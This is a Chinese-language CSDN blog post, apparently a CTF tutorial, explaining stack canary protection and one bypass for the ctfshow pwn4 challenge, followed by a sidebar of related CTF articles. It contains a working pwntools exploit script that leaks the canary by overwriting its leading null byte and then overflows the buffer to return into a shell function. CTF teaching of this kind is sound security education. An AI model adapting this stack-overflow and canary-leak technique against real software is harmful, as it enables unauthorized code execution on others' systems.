pwn入门之canary保护

于 2024-01-18 20:23:26 发布
阅读量672 收藏 10
点赞数 22
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangxunyu6/article/details/135682410
版权

1.什么是canary?

简单来说canary是生成的一个以 0x00开头的随机数,它存在于ebp或者rbp的附近。

2.canary保护机制是如何实现的?

简单来说就是你输入的值和canary值不相同的话,结束程序。

3.如何绕过?

今天主要讲一种方法利用格式化字符串漏洞泄露

例题ctfshow--pwn4

vuln函数

read函数读入数据通过printf输出。然后就是v3就是我们要泄露出的canary值,跟进v3

我们可以看到buf变量距离ebp112距离,canary距离ebp12距离。那么思路来了。

首先填充垃圾数据100个到刚好贴着canary,然后接收canary的值。这样canary就被我们泄露出来了。Exp如下:

from pwn import *    
p = process("./pwn4")
elf=ELF('./pwn4')  
shell=0x0804859B
p.recvuntil('Hacker!') 
payload=b'f'*100+b'b'         #这里多填一个b覆盖掉canary的\x00
p.send(payload)               #不能用sendline,因为一个回车会占字节
p.recvuntil('b')
canary=b'\x00'+p.recv(3)       
print(canary)
payload = b'A'* 100 + canary + b'A'* 12 + p32(shell)    
p.sendline(payload)
p.interactive()

解读第二个payload:buf变量距离返回地址距离116,距离canary100,(canary在这里占4字节),emmm....就是正常的ret2text了。

总结:这个题是最简单的canary题型,其他的canary估计是配合着libc等类型共同出现。

补充:据我所知:canary在32位elf中占4字节,在64位elf中占8字节。

wangxunyu6
关注
  • 22
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞等
warmup pwn入门
02-11
pwn入门
pwn入门题目+exp
最新发布
01-26
初级的ROP,附有完整exp,可以学一下
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
Pwn入门笔记(四)canary初识
qq_33590156的博客
11-26 1570
Leak Canary Canary1 wp 什么是canary呢,就是在程序进行输入前会生成一个随机数(每一次执行程序这个数都不一样),格式为“0x…00”,在ida中是这样的 画圈的地方就是生成了canary值赋给v4,最后一行将v4和之前的值取异或,之后return将这个值返回。 题目逻辑很简单,就是两次输入输出,很明显格式化字符串漏洞。然后还有个函数叫getshell,这就是我们要执行的system函数,思路就清晰了,先用格式化字符串漏洞打印canary的值,然后栈溢出获取shell。 那么在栈上他
PWN-canary学习
苗_的博客
02-10 1475
先简单介绍一下canary: Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中获取一个值,一般存到EBP - 0x4(32位)或RBP - 0x8...
pwn学习】Canary的各种绕过姿势
Morphy_Amo的博客
12-24 5220
Canary各种绕过姿势
ctf(pwn) canary保护机制讲解 与 解密方法介绍
半岛铁盒的博客
03-03 2077
Canary保护机制 canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 在函数开始时就随机产生一个值,将这个值CANARY放到栈上紧挨ebp的上一个位置,当攻击者想通过缓冲区溢出覆盖ebp或者ebp下方的返回地址时,一定会覆盖掉CANARY的值;当程序结束时,程序会检查CANARY这个值和之前的是否一致,如果不一致,则不会往下运行,从而避免了缓冲区溢出攻
pwn学习-canary
WocW的博客
02-26 2287
CTF-WIKI-pwn-cannary 漏洞复现   Canary 实现原理  开启 Canary 保护的 stack 结构大概如下 // ex2.c #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> void getshell...
PWN学习】cannary绕过方式汇总
weixin_41748164的博客
12-23 656
利用cannary解题在现在的CTF比赛中似乎已经过时了,只是为了学习了解一下。
2021-06-15 pwn之canary绕过简单思路梳理
yulate的个人博客
07-13 743
文章目录一、原题链接二、简单解题思路0x01、查看程序保护0x02、main的栈0x03、构造payload0x04、最终exp 一、原题链接 bugku-pwn4 二、简单解题思路 0x01、查看程序保护 开启了canary保护和NX保护 0x02、main的栈 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[48]; // [rsp+10h] [rbp-240h] BYREF char v5
PWN题型之对抗Canary技术
swedsn
07-29 679
文章目录前言0x1 :什么是Canry保护0x2 :对抗思路0x3 :格式化字符串(利用 +分析+实例)0x4 :smashing利用(利用 +分析+实例)总结 前言 参考资料: b站:https://www.bilibili.com/video/BV1Yf4y197Wi?p=5 漏洞利用的方式讲了很多,不过需要掌握基础知识 看雪:https://www.kanxue.com/book-57-857.htm jin讲了原理,讲了如何运行调试,适合新手,不过要收费。 0x1 :什么是Canry保护 大家想
PWN入门(10)绕过程序堆栈Canary防护
Ba1_Ma0的博客
10-05 1065
简介“pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入10文件夹。
Pwn题——canary
weixin_44319142的博客
04-03 1764
canary 嘤嘤,不仅NX打开了,栈里面还有canary,这是什么鬼。。。。。 Canary保护机制的原理,是在一个函数入口处从fs段内获取一个随机值,一般存到EBP - 0x4(32位)或RBP - 0x8(64位)的位置。如果攻击者利用栈溢出修改到了这个值,导致该值与存入的值不一致,__stack_chk_fail函数将抛出异常并退出程序。Canary最高字节一般是\x00,防止由于其他...
BugkuCTF-PWN题canary超详细讲解
am_03的博客
08-31 2146
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解题流程 题目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
格式化字符串漏洞泄露StackCanary
ACdream
04-26 3019
2017陕西省的pwn_box这个题作为调试的程序,gdb作为工具 先来熟悉原理,推荐几个pdf学习懂原理吧: Format String Exploitation-Tutorial By Saif El-Sherei Exploiting Format String Vulnerabilities  scut/team teso 看完这几个会对原理有深刻认识,然后如何操作呢? 戳我
pwn学习总结
Ree的整理与收集
09-01 5737
遇到的优秀文章 关于Heap Overflow(堆溢出) Linux常见漏洞利用技术实践 GCC 中的编译器堆栈保护技术 Linux环境进程间通信(一) 现代Linux操作系统的栈溢出(一) 解读Linux安全机制之栈溢出保护工具与常用命令*nix命令 export ...="..." 添加一个环境变量,这个环境变量只在这个shell进程中起作用 gdbgdb的话一定会装peda插件。p
ctf-pwn:canary绕过
chennbnbnb的博客
01-19 2925
文章目录覆盖00字符读出canary原理利用条件漏洞代码编译选项EXP利用格式化字符串漏洞读出canary原理漏洞代码编译选项EXP逐字节猜解canary原理漏洞代码编译EXPSSP Leak原理 覆盖00字符读出canary 原理 canary的值设计为以0x00结尾,防止read,printf灯函数直接读出 通过栈溢出覆盖最低位的字节,从而获得canary 利用条件 存在read/pri...
ctfshow pwn入门
09-29
ctfshow pwn入门是一个关于ASLR(地址空间布局随机化)的题目。在该题目中,程序会读取系统中/proc/sys/kernel/randomize_va_space文件的内容,如果内容为0,则输出的flag是正确的,否则输出的flag是错误的。所以,我们需要先修改/proc/sys/kernel/randomize_va_space文件的内容为0,然后运行pwn文件,即可得到正确的flag。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值